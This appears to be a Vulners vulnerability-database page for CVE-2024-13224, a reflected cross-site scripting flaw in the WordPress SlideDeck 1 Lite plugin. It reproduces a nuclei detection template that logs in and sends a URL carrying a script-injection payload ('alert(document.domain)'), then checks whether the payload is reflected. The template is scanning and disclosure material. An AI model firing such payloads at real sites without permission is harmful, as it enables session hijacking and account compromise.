Lucene search
K

SlideDeck 1 Lite Content Slider - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Reflected XSS in WordPress SlideDeck plugin <=1.4.8 via unsanitized output; requires crafted URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13224
31 Jan 202506:16
circl
CVE
CVE-2024-13224
31 Jan 202506:00
cve
Cvelist
CVE-2024-13224 SlideDeck 1 Lite Content Slider <= 1.4.8 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51443
3 Oct 202520:07
euvd
NVD
CVE-2024-13224
31 Jan 202506:15
nvd
OSV
CVE-2024-13224
31 Jan 202506:15
osv
Patchstack
WordPress SlideDeck 1 Lite Content Slider plugin <= 1.4.8 - Reflected XSS vulnerability
31 Jan 202508:39
patchstack
Positive Technologies
PT-2025-2078
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13224
23 May 202507:10
redhatcve
Vulnrichment
CVE-2024-13224 SlideDeck 1 Lite Content Slider <= 1.4.8 - Reflected XSS
31 Jan 202506:00
vulnrichment
Rows per page
id: CVE-2024-13224

info:
  name: SlideDeck 1 Lite Content Slider - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    SlideDeck 1 Lite Content Slider WordPress plugin <= 1.4.8 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed.
  reference:
    - https://wpscan.com/vulnerability/32a90907-e82f-41b3-b20e-d10a722e2999/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13224
    cwe-id: CWE-79
    epss-score: 0.00577
    epss-percentile: 0.43376
    cpe: cpe:2.3:a:dtelepathy:slidedeck_1_lite_content_slider:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: dtelepathy
    product: slidedeck_1_lite_content_slider
  tags: cve,cve2024,wpscan,wp-plugin,dtelepathy,slidedeck-1-lite-content-slider

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=slidedeck.php/slidedeck_dynamic&action=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "></script><script>alert(document.domain)</script><script>", "dynamic_slidedeck_form")'
        condition: and
# digest: 4b0a004830460221009e4dd988c475741742d7d74b6ad41afd9c22aaa5166f6896968074ac39c0c5a802210090ee09b80df58db88915bcefd0435ac3d054416e16dfc0dd08c3fefa69d88dc9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Feb 2026 13:33Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.00577
SSVC
9